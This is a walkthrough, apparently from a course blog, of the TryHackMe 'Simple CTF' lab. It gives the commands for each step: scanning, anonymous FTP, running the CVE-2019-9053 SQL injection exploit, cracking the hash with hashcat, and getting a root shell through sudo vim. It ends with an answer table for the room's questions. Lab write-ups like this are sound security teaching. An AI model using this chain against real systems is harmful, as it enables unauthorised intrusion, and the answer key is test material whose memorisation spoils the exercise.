Papadope Course
EN | ΕΛ

Simple CTF - TryHackMe Walkthrough

Simple CTF - TryHackMe Walkthrough

A beginner-friendly boot2root machine covering enumeration, web exploitation, password cracking, and privilege escalation.

Room URL: https://tryhackme.com/room/easyctf

Difficulty: Easy

🛠️ Tools & Techniques Used

  • Nmap - Port scanning
  • Gobuster - Directory enumeration
  • FTP - Anonymous login
  • Searchsploit - Exploit database search
  • Hashcat - Password cracking
  • SSH - Remote access
  • GTFOBins - Privilege escalation

🔎 Step-by-Step Walkthrough

1. Enumeration

Nmap Scan

Start with a comprehensive port scan:

nmap -sC -sV -oN nmap_initial.txt <TARGET_IP>

Findings:

Port Service Notes
21 FTP Anonymous login allowed
80 HTTP Web server
2222 SSH Non-standard SSH port

FTP Access

Connect to FTP with anonymous login:

ftp <TARGET_IP>
# Username: anonymous
# Password: (leave blank or enter anything)

Found: A file named ForMitch.txt containing a password hint.

Web Directory Enumeration

Use Gobuster to find hidden directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found: /simple — A web application running CMS Made Simple

2. Vulnerability Discovery

  1. Navigate to /simple and identify the CMS version (e.g., 2.2.8)
  2. Search for known vulnerabilities:
searchsploit "CMS Made Simple 2.2.8"

Found: CVE-2019-9053 — SQL Injection vulnerability (ExploitDB ID: 46635)

3. Exploitation

Download and Run the Exploit 

# Download the exploit
searchsploit -m 46635

# Install required dependency (Python2)
sudo pip2 install termcolor

# Run the exploit
python2 46635.py -u http://<TARGET_IP>/simple

Result: Retrieved credentials:

  • Username: mitch
  • Hash: (MD5 hash with salt)

4. Password Cracking

Crack the retrieved hash using Hashcat:

hashcat -m 20 hash.txt /usr/share/wordlists/rockyou.txt

💡 Hash mode -m 20: MD5 with salt format hash:salt

Cracked password: secret

5. Gaining Access

SSH into the machine with the cracked credentials:

ssh mitch@<TARGET_IP> -p 2222

🚩 User Flag: Found in user.txt in mitch's home directory.

6. Privilege Escalation

Check Sudo Permissions 

sudo -l

Finding: User mitch can run /usr/bin/vim as root without a password.

Exploit vim for Root Shell

Using GTFOBins technique:

sudo /usr/bin/vim

Inside vim, spawn a root shell:

:!/bin/bash

🚩 Root Flag: Found in /root/root.txt

📝 Answers to Room Questions

Question Answer
How many services are running under port 1000? 2
What is running on the higher port? SSH
What's the CVE you're using against the application? CVE-2019-9053
To what kind of vulnerability is the application vulnerable? SQLi
What's the password? secret
Where can you login with the details obtained? SSH
What's the user flag? (found in user.txt)
Is there any other user in the home directory? sunbath
What can you leverage to spawn a privileged shell? vim
What's the root flag? (found in root.txt)

📌 Key Takeaways

  • Always check FTP access — Anonymous login can leak useful information
  • Directory enumeration often reveals web app entry points
  • Version identification is crucial for finding public exploits
  • GTFOBins is essential for privilege escalation via sudo misconfigurations
  • Non-standard ports (like SSH on 2222) are common in CTFs

💬 Join our Discord community: https://discord.gg/CVpyqCek

Previous RootMe - TryHackMe Walkthrough